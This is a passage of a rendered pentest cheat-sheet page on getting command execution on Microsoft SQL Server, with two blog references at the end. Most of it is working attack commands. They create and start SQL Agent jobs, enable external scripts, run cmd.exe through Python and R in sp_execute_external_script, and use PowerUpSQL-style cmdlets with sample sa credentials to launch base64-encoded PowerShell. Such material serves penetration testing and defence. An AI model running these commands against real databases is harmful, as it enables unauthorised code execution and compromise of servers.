class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="o">@</span><span class="n">retry_interval</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">5</span><span class="w"> </span><span class="p">;</span>
<a id="__codelineno-19-4" name="__codelineno-19-4" href="#__codelineno-19-4"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">dbo</span><span class="p">.</span><span class="n">sp_add_jobserver</span><span class="w"> </span><span class="o">@</span><span class="n">job_name</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">N</span><span class="s1">&#39;test_powershell_job1&#39;</span><span class="p">;</span><span class="w"> </span>
<a id="__codelineno-19-5" name="__codelineno-19-5" href="#__codelineno-19-5"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">dbo</span><span class="p">.</span><span class="n">sp_start_job</span><span class="w"> </span><span class="n">N</span><span class="s1">&#39;test_powershell_job1&#39;</span><span class="p">;</span>
<a id="__codelineno-19-6" name="__codelineno-19-6" href="#__codelineno-19-6"></a>
<a id="__codelineno-19-7" name="__codelineno-19-7" href="#__codelineno-19-7"></a><span class="c1">-- delete</span>
<a id="__codelineno-19-8" name="__codelineno-19-8" href="#__codelineno-19-8"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">dbo</span><span class="p">.</span><span class="n">sp_delete_job</span><span class="w"> </span><span class="o">@</span><span class="n">job_name</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">N</span><span class="s1">&#39;test_powershell_job1&#39;</span><span class="p">;</span>
</code></pre></div>
<h3 id="list-all-jobs">List All Jobs</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="nb">SELECT </span><span class="n">job_id</span><span class="p">,</span> <span class="no">[name]</span> <span class="n">FROM</span> <span class="n">msdb</span><span class="p">.</span><span class="n">dbo</span><span class="p">.</span><span class="n">sysjobs</span><span class="p">;</span>
<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a><span class="nb">SELECT </span><span class="n">job</span><span class="p">.</span><span class="n">job_id</span><span class="p">,</span> <span class="n">notify_level_email</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">enabled</span><span class="p">,</span> <span class="n">description</span><span class="p">,</span> <span class="n">step_name</span><span class="p">,</span> <span class="n">command</span><span class="p">,</span> <span class="n">server</span><span class="p">,</span> <span class="n">database_name</span> <span class="n">FROM</span> <span class="n">msdb</span><span class="p">.</span><span class="n">dbo</span><span class="p">.</span><span class="n">sysjobs</span> <span class="n">job</span> <span class="n">INNER</span> <span class="n">JOIN</span> <span class="n">msdb</span><span class="p">.</span><span class="n">dbo</span><span class="p">.</span><span class="n">sysjobsteps</span> <span class="n">steps</span> <span class="n">ON</span> <span class="n">job</span><span class="p">.</span><span class="n">job_id</span> <span class="p">=</span> <span class="n">steps</span><span class="p">.</span><span class="n">job_id</span>
<a id="__codelineno-20-3" name="__codelineno-20-3" href="#__codelineno-20-3"></a><span class="nb">Get-SQLAgentJob</span> <span class="n">-Instance</span> <span class="s2">&quot;&lt;DBSERVERNAME\DBInstance&gt;&quot;</span> <span class="n">-username</span> <span class="n">sa</span> <span class="n">-Password</span> <span class="n">Password1234</span> <span class="n">-Verbose</span>
</code></pre></div>
<h2 id="external-scripts">External Scripts</h2>
<p>Requirements:</p>
<ul>
<li>Feature 'Advanced Analytics Extensions' must be installed</li>
<li>Enable <strong>external scripts</strong>.</li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-21-1" name="__codelineno-21-1" href="#__codelineno-21-1"></a><span class="n">sp_configure</span><span class="w"> </span><span class="s1">&#39;external scripts enabled&#39;</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<a id="__codelineno-21-2" name="__codelineno-21-2" href="#__codelineno-21-2"></a><span class="n">RECONFIGURE</span><span class="p">;</span>
</code></pre></div>
<h3 id="python">Python</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-22-1" name="__codelineno-22-1" href="#__codelineno-22-1"></a><span class="nb">Invoke-SQLOSCmdPython</span> <span class="n">-Username</span> <span class="n">sa</span> <span class="n">-Password</span> <span class="n">Password1234</span> <span class="n">-Instance</span> <span class="s2">&quot;&lt;DBSERVERNAME\DBInstance&gt;&quot;</span> <span class="n">-Command</span> <span class="s2">&quot;powershell -e &lt;base64encodedscript&gt;&quot;</span> <span class="n">-Verbose</span>
<a id="__codelineno-22-2" name="__codelineno-22-2" href="#__codelineno-22-2"></a>
<a id="__codelineno-22-3" name="__codelineno-22-3" href="#__codelineno-22-3"></a><span class="n">EXEC</span> <span class="n">sp_execute_external_script</span> <span class="nv">@language</span> <span class="p">=</span><span class="n">N</span><span class="s1">&#39;Python&#39;</span><span class="p">,</span><span class="nv">@script</span><span class="p">=</span><span class="n">N</span><span class="s1">&#39;import subprocess p = subprocess.Popen(&quot;cmd.exe /c whoami&quot;, stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), &quot;utf-8&quot;)])&#39;</span>
<a id="__codelineno-22-4" name="__codelineno-22-4" href="#__codelineno-22-4"></a><span class="n">WITH</span> <span class="n">RESULT</span> <span class="n">SETS</span> <span class="p">((</span><span class="no">[cmd_out]</span> <span class="n">nvarchar</span><span class="p">(</span><span class="n">max</span><span class="p">)))</span>
</code></pre></div>
<h3 id="r">R</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-23-1" name="__codelineno-23-1" href="#__codelineno-23-1"></a><span class="nb">Invoke-SQLOSCmdR</span> <span class="n">-Username</span> <span class="n">sa</span> <span class="n">-Password</span> <span class="n">Password1234</span> <span class="n">-Instance</span> <span class="s2">&quot;&lt;DBSERVERNAME\DBInstance&gt;&quot;</span> <span class="n">-Command</span> <span class="s2">&quot;powershell -e &lt;base64encodedscript&gt;&quot;</span> <span class="n">-Verbose</span>
<a id="__codelineno-23-2" name="__codelineno-23-2" href="#__codelineno-23-2"></a>
<a id="__codelineno-23-3" name="__codelineno-23-3" href="#__codelineno-23-3"></a><span class="n">EXEC</span> <span class="n">sp_execute_external_script</span> <span class="nv">@language</span><span class="p">=</span><span class="n">N</span><span class="s1">&#39;R&#39;</span><span class="p">,</span><span class="nv">@script</span><span class="p">=</span><span class="n">N</span><span class="s1">&#39;OutputDataSet &lt;- data.frame(system(&quot;cmd.exe /c dir&quot;,intern=T))&#39;</span>
<a id="__codelineno-23-4" name="__codelineno-23-4" href="#__codelineno-23-4"></a><span class="n">WITH</span> <span class="n">RESULT</span> <span class="n">SETS</span> <span class="p">((</span><span class="no">[cmd_out]</span> <span class="n">text</span><span class="p">));</span>
<a id="__codelineno-23-5" name="__codelineno-23-5" href="#__codelineno-23-5"></a><span class="n">GO</span>
<a id="__codelineno-23-6" name="__codelineno-23-6" href="#__codelineno-23-6"></a>
<a id="__codelineno-23-7" name="__codelineno-23-7" href="#__codelineno-23-7"></a><span class="nv">@script</span><span class="p">=</span><span class="n">N</span><span class="s1">&#39;OutputDataSet &lt;-data.frame(shell(&quot;dir&quot;,intern=T))&#39;</span>
</code></pre></div>
<h2 id="references">References</h2>
<ul>
<li><a href="https://blog.netspi.com/attacking-sql-server-clr-assemblies/">Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017</a></li>
<li><a href="https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution">MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1zM12.5 7v5.2l4 2.4-1 1L11 13V7zM11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">November 5, 2024</span>
</span>
</aside>
<div class="social-container">
<b>Share this content</b>
<div class="a2a_kit a2a_kit_size_32 a2a_default_style">
<a class="a2a_dd" href="https://www.addtoany.com/share"></a>
<a class="a2a_button_x"></a>
<a class="a2a_button_telegram"></a>
<a class="a2a_button_linkedin"></a>
<a class="a2a_button_email"></a>
<a class="a2a_button_microsoft_teams"></a>
</div>
<br>
<script async src="https://static.addtoany.com/menu/page.js"></script>
</div>
<script defer src="https://cloud.umami.is/script.js" data-website-id="49aad71c-7d98-4635-8bd5-b6799c8874f8"></script>
</article>
</div>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
<button type="button" class="md-top md-icon" data-md-component="top" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
Back to top
</button>
</main>
<footer class="md-footer">
<div class="md-footer-meta md-typeset">
<div class="md-footer-meta__inner md-grid">
<div class="md-copyright">
Made with
<a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
Material for MkDocs
</a>
</div>
</div>
</div>
</footer>
</div>
<div class="md-dialog" data-md-component="dialog">
<div class="md-dialog__inner md-typeset"></div>
</div>
<script id="__config" type="application/json">{"base": "../..", "features": ["content.code.copy", "content.action.edit", "content.action.view", "content.tooltips", "navigation.tracking", "navigation.top", "search.share", "search.suggest"], "search": "../../assets/javascripts/workers/search.6ce7567c.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
<script src="../../assets/javascripts/bundle.83f73b43.min.js"></script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink